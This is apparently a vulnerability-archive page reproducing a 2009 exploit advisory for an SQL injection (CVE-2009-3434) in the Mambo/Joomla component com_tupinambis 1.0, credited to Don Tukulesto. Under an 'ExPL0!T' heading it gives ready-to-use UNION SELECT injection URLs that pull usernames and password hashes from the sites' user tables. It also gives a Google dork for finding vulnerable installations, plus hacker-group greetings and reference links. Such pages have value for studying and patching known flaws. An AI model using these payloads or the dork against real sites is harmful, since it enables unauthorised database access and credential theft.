Mambo/Joomla com_tupinambis 1.0 SQL Injection

2009.09.29

Credit: Don Tukulesto

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-3434

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

#######################################################
## Mambo/Joomla SQL Injection Vulneralbility ##
## Component : com_tupinambis ##
## Release : September 23, 2009 ##
## --------------------------------------------------##
##.---..-..-..-.,-..-..-..-. .---..---..---..----. ##
##`| |'| || || . < | || || |__ | |- \ \ `| |'| || | ##
## `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ##
##-------------------------------------------------- ##
#######################################################
[+] Author : Don Tukulesto
[+] Homepage : http://www.indonesiancoder.com
[+] Location : Republik Indonesia
#######################################################
[ Software Information ]
[+] Software : com_tupinambis
[+] Version : 1.0
[+] Vendor : www.tupinambis.net
[+] Download : http://www.onestopjoomla.com/extensions/auction/tupinambis/
[+] Vulnerability : SQL Injection
[+] Google Dork : inurl:"com_tupinambis"
#######################################################
[ ExPL0!T ]
[+] Mambo : http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+mos_users--
[+] Joomla : http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+jos_users--
#######################################################
[ Greetings ]
[+] All of Indonesian Coder Member, M3NW5, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Quick_5ilv3r, ran, m4ho666, Den Bayan, vyc0d, bh4nd55, Den Awink
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666 + tante Miya, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom, Pathloader, tiw0L,
[+] V3n0m, Str0ke, sp3x, todd, Antisecurity.org, and YOU !!!
[ SHOUT ]
Happy Eidul Fitri 1430H.
Minal Aidin Wal Faidzin.
[ SP3C!AL ]
lovely Emak, Bapak, Adek ku sayang (^_^)

References:

http://xforce.iss.net/xforce/xfdb/53454

http://www.vupen.com/english/advisories/2009/2730

http://www.securityfocus.com/bid/36511

http://secunia.com/advisories/36848

http://packetstormsecurity.org/0909-exploits/mambojoomlatupinambis-sql.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mambo/Joomla com_tupinambis 1.0 SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.